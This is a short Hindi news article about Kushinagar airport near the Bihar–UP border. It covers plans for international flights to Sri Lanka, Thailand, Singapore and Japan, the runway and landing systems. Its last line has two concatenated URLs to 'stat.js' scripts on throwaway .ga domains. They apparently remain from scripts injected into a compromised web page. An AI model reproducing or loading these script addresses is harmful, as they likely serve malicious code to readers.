बिहार के रेलयात्रियों के अच्छी खबर है आमतौर पर देखा जाये तो बिहार के हवाई यात्री दूसरे देश जाने के लिए दिल्ली या लखनऊ के अंतराष्ट्रीय एयरपोर्ट से उड़ान भरना होता है। लेकिन अब जल्द ही इस समस्या से बिहार और यूपी के हवाई यात्रियों को बड़ी सहूलियत मिलने वाली है।
बिहार यूपी के बॉर्डर पर स्थित कुशीनगर एयरपोर्ट पर जल्द ही अंतराष्ट्रीय उड़ाने शुरू होने वाली है। एयरपोर्ट के रनवे की लम्बाई 3.2 किलोमीटर है जिसपे ए-320 और बी-737 विमान के साथ साथ नैरो बॉडी एयरक्राफ्ट भी आसानी से उतारा जा सकता है। इस एयरपोर्ट पर एयर ट्रैफिक एडवाइसरी सिस्टम इंस्टाल होने के बाद यहाँ किसी भी मौसम जैसे बारिश, कोहरा या रात में भी विमान की लैंडिग आसानी से हो सकेगा।
एएआई द्वारा मिली जानकारी के अनुसार श्रीलंका, म्यांमार, थाईलैंड, सिंगापुर व जापान से उड़ान की योजना है बनाई गयी है। इस महीने के मध्य में श्रीलंका से आ रही पहली अंतराष्ट्रीय उड़ान के बाद पूरी तरह से विस्तार करने की योजना हैं। उड़ाने चालू होने से चीन के साथ साथ साउथ कोरिया के विमान यात्री सिंगापुर एयरपोर्ट से वियतनाम, भूटान, एवं कम्बोडिया के यात्री थाईलैंड के एयरपोर्ट से कुशीनगर के लिए सीधी उड़ान भर सकेंगे।
https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms